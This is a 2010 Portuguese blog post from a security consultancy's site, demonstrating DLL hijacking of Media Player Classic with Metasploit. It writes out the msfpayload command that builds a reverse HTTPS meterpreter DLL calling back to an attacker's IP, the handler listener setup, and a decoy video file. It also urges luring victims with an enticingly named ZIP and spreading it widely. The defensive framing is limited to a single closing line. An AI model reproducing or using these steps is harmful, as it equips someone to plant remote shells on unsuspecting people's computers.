Linkedin-in Youtube Twitter Facebook-f Instagram
  • +55 (11) 3255 -3926
  • contato@ibliss.com.br
IBLISS – Consultoria em Segurança Cibernética
  • Home
  • A IBLISS
  • Nossos Serviços
    • Consultoria em Cibersegurança
    • Governança, Risco e Compliance (GRC)
    • Serviços Gerenciados (MSS)
    • Teste de Intrusão
    • Conscientização e Cultura
    • AppSec & DevSecOps
  • Blog
  • Oportunidades
  • Contato
IBLISS – Consultoria em Segurança Cibernética
  • A IBLISS
    • Nossa Equipe
    • Responsabilidade Social
  • Blog Minuto Proteção
  • Contato
  • Home
  • Nosso Propósito
  • Nossos Serviços
    • AppSec & DevSecOps
      • Análise SAST e DAST
      • Revisão de Segurança (ASVS)
    • Conscientização e Cultura
    • Consultoria em Cibersegurança
      • Teste de Intrusão
    • Governança, Risco e Compliance (GRC)
    • Serviços Gerenciados (MSS)
  • Parceiros
  • Política de Alto Nível
  • Política de Privacidade

Blog Minuto Proteção

  • Home
  • Blog Minuto Proteção
  • Segurança Digital
  • DLL Hijacking – Exploração
Segurança Digital
_ 10 de novembro de 2010

DLL Hijacking – Exploração

Apresentamos abaixo uma breve descrição técnica e um vídeo demonstrativo da utilização da técnica DLL Hijacking por meio do Framework Metasploit. Se quiser ler sobre o que é esta técnica, acesse a parte 1 do artigo.

Para executar um ataque de DLL Hijacking, o programa que irá carregar a DLL deve ser previamente definido, de forma que a DLL vulnerável possa ser substituída pela DLL maliciosa. Abaixo segue uma lista de DLL’s vulneráveis e seus respectivos softwares:
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/

Uma vez que a DLL tenha sido modificada, se faz necessário que este arquivo seja substituído pelo arquivo original na máquina vítima ou que ele esteja na mesma pasta que o arquivo a ser executado. A grande vantagem de se ter a DLL maliciosa dentro do diretório de instalação do software alvo é que sempre quando o usuário utilizar o software o mesmo carregará a DLL maliciosa.

SHOW TIME!
A seguir será realizada uma demonstração de como utilizar está técnica, utilizando o famoso meterpreter em uma DLL do programa “Media Player Classic”.

httpv://www.youtube.com/watch?v=mucZ5ArSjSk

O primeiro passo antes de qualquer exploração é atualizar o Metasploit para evitar possíveis erros ou falta de plugins. No BackTrack4, chame a console do Metasploit e execute o comando de atualização:

root@bt: /pentest/exploits/framework3# ./msfconsole

# svn update

#exit

Vamos modificar a DLL original com códigos maliciosos utilizando o aplicativo msfpayload do Metasploit. É importante observar que o nome dado a DLL deve ser o mesmo da DLL utilizada pelo software alvo (Media Player Classic versão 6.4.9.1). O nome da DLL pode variar de acordo com a versão do programa alvo.

O Meterpreter contém várias intruções de códigos maliciosos pré-definidos. No caso, iremos utilizar uma Shell Reverso HTTPS e em seguida, vamos criar um arquivo de vídeo (fake) que servirá como isca para a vítima:

root@bt: /pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_https LHOST=192.168.100.107 LPORT=443 D > /root/iacenc.dll

# touch nome_do_video_desejado.flv

Com um pouco de criatividade e Engenharia Social, pode-se criar um arquivo ZIP de nome atrativo contendo a DLL maliciosa e o arquivo de falso.  (Imagine um arquivo com o nome de Tropa de Elite 2 )

Antes de enviar o arquivo para a vítima, é necessário deixar o Metasploit aguardando a conexão reversa:

root@bt: /pentest/exploits/framework3# ./msfconsole

use multi/handler

set PAYLOAD windows/meterpreter/reverse_https

set LHOST 192.168.100.107

set LPORT 443

exploit –j

Agora, pode-se enviar o arquivo para a vítima ou espalhá-lo da forma que achar mais conveniente e aguardar a conexão reversa da vítima…

Sim.. simples assim e assustador…

Explore nosso blog para conhecer mais a fundo outros ataques e como se proteger.

Até a próxima! 🙂

Vulnerabilidades Web Attack
♥
Conheça a Técnica de DLL Hijacking
8 de novembro de 2010
SecurityLeaders – Estamos patrocinando!!!
17 de novembro de 2010

Leave a comment Cancelar resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Postagens Recentes

  • IBLISS conquista certificação GPTW pelo terceiro ano consecutivo
  • IBLISS Digital Security anuncia parceria estratégica com a IT-ONE
  • Manipulação de curto tempo de expiração de tokens de autorização
  • Entenda o que é DevSecOps – INFOGRÁFICO
  • Teste de Invasão: Conheça as principais vantagens

Categorias

  • Acontece na IBLISS
  • Ameaças
  • AppSec & DevSecOps
  • Ataques Cibernéticos
  • Blog
  • Cibersegurança
  • Consciencialização
  • Conscientização
  • Cyber Protection
  • Diário de Um Pentester
  • eBook
  • Education
  • Estratégia em Segurança
  • Eventos
  • GDPR
  • Gestão de vulnerabilidades
  • LGPD
  • Notícias IBLISS
  • Privacidade
  • RGPD
  • Risk e compliance
  • root
  • Segurança Digital
  • Segurança no E-Commerce
  • Sensibilização
  • Technology
  • Testes de invasão
  • Uncategorized
  • Vagas
  • Vulnerabilidades

Contato

Av. Angélica, 2852
2° Andar
CEP 01228-200
Bela Vista
São Paulo / SP

contato@ibliss.com.br

+55 (11) 3255 -3926

IBLISS_Parcerias_Certificado-1536x512-1-pm727zz2jah6fbi8ty4ggbgwzzn3clcj1wf0235qf4

Links

  • A IBLISS
  • Nossos Serviços
  • Blog
  • Oportunidades
  • Contato
  • Política de Privacidade

Siga a IBLISS

Linkedin Youtube Facebook Instagram Twitter

Newsletter

© 2022 IBLISS Digital Security. Todos os direitos reservados. Desenvolvido por QMove.